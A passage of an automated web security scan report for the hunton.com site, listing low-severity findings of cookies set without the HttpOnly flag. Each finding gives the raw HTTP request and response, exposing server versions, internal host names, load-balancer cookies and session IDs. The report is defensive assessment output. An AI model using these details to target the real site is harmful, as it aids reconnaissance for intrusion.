Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.../*********************************************
                   GENERAL
*********************************************/
html, body {padding:0;margin:0;min-height:468px;height:100%;font:normal 12px/normal Ari
...[SNIP]...
18.226. http://www.hunton.com/FCWSite/Include/header.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/header.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/header.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1922
Content-Type: text/css
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:30:00 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*********************************************
                   HEADER
*********************************************/
div.headerB {}
div.headerA {}
div.header {text-align:left;padding:0 0 10px;}

div.heade
...[SNIP]...
18.227. http://www.hunton.com/FCWSite/Include/header_web.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/header_web.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/header_web.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 3361
Content-Type: text/css
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:31 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.../*********************************************
                   HEADER
*********************************************/
div.headerB {position:relative;z-index:100;height:117px;}
div.headerA {}
div.header {t
...[SNIP]...
18.228. http://www.hunton.com/FCWSite/Include/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/menu.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 4514
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:48 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/***********************************************
* dropdown CSS Menu script- . Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic D
...[SNIP]...
18.229. http://www.hunton.com/FCWSite/Include/packetbuilder.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/packetbuilder.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/packetbuilder.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 3433
Content-Type: text/css
Last-Modified: Wed, 23 Mar 2011 21:31:50 GMT
Accept-Ranges: bytes
ETag: "0e739b8a1e9cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:07 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.../* overlay screen for dialogs */
#overlayScreen
{
   top: 0;
   left: 0;
   z-index: 43;
   position: fixed;
   width: 100%;
   height: 100%;
   background-color: #000000;    
   display: none;    
}

/* pa
...[SNIP]...
18.230. http://www.hunton.com/FCWSite/Include/pdf.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/pdf.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/pdf.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 8810
Content-Type: text/css
Last-Modified: Fri, 06 May 2011 02:41:26 GMT
Accept-Ranges: bytes
ETag: "0cf251897bcc1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:47 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

#maintable    {display:block;}
#maintable    .column1{display:block;width:500px;}
#maintable    .column2{display:block;width:200px;}
#footer    {display:block;}
#header_print {display:block;}

#header {disp
...[SNIP]...
18.231. http://www.hunton.com/FCWSite/Include/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/print.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 23674
Content-Type: text/css
Last-Modified: Fri, 06 May 2011 20:28:18 GMT
Accept-Ranges: bytes
ETag: "57d2d5222cccc1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:27:36 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

/*********************************************
                   HEADER
*********************************************/
div.headerB {position:static;height:auto;margin-bottom:50px;}
div.header {position:static;
...[SNIP]...
18.232. http://www.hunton.com/FCWSite/Include/spamproof.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/spamproof.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/spamproof.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:27:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=4845
Expires: Sat, 07 May 2011 00:48:36 GMT
Last-Modified: Fri, 06 May 2011 22:01:56 GMT
Content-Type: text/javascript; charset=us-ascii
Content-Length: 1487
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

function SendMail(name, domain){ var BaseOptions = 'width=525,height=450,status=no,scrollbars=yes,resizeable=yes';if(name==''){ document.location.href='mailto:' + name + '@' + domain;}else{ v
...[SNIP]...
18.233. http://www.hunton.com/FCWSite/Include/spamproof.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Include/spamproof.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/Include/spamproof.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1958
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 21:57:06 GMT
Accept-Ranges: bytes
ETag: "0656b15dce8cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:53 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

...// SpamProof jscript methods
//To be used to prevent spammers from grabbing email addresses from a website
//
//Example:
//For more information contact our <Script language="JavaScript">PrintMa
...[SNIP]...
18.234. http://www.hunton.com/FCWSite/img/Hunton/arrow_green_onblackbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/arrow_green_onblackbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/arrow_green_onblackbg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1184
Content-Type: image/gif
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:30:03 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

GIF89a.......3.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...
18.235. http://www.hunton.com/FCWSite/img/Hunton/bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/bullet.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1124
Content-Type: image/gif
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:30:02 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

GIF89a    .
..........NNN...333.........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:3
...[SNIP]...
18.236. http://www.hunton.com/FCWSite/img/Hunton/home_tile.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/home_tile.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/home_tile.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1364
Content-Type: image/gif
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:02 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

GIF89a.......................................................................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="ado
...[SNIP]...
18.237. http://www.hunton.com/FCWSite/img/Hunton/middle/arrow_indicator.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/middle/arrow_indicator.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/middle/arrow_indicator.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1131
Content-Type: image/png
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:28:56 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

.PNG
.
...IHDR..."...........~.....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
18.238. http://www.hunton.com/FCWSite/img/Hunton/middle/body_wide.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/middle/body_wide.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/middle/body_wide.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1138
Content-Type: image/png
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:06 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.PNG
.
...IHDR.............0qD.....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
18.239. http://www.hunton.com/FCWSite/img/Hunton/middle/bottom_wide.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/middle/bottom_wide.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/middle/bottom_wide.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1080
Content-Type: image/png
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:06 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
18.240. http://www.hunton.com/FCWSite/img/Hunton/middle/top_wide.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/img/Hunton/middle/top_wide.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FCWSite/img/Hunton/middle/top_wide.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 1149
Content-Type: image/png
Last-Modified: Thu, 10 Feb 2011 23:40:46 GMT
Accept-Ranges: bytes
ETag: "0134ef07bc9cb1:fa3"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A10
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:29:06 GMT
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1108924170.20480.0000; path=/

.PNG
.
...IHDR...............60....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
18.241. http://www.hunton.com/_xpressHighlights/highlights_image.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /_xpressHighlights/highlights_image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_xpressHighlights/highlights_image.aspx?entry=048495cd-cb37-4139-9919-67e523cdd4d7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:29:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1843; path=/
Set-Cookie: PortletId=5980402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=hj0mnk45k0ecg2ykwmtwtuy1; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: public
Content-Type: image/jpeg
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/
Content-Length: 12398

......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
18.242. http://www.hunton.com/aboutus/uniGC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:27:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
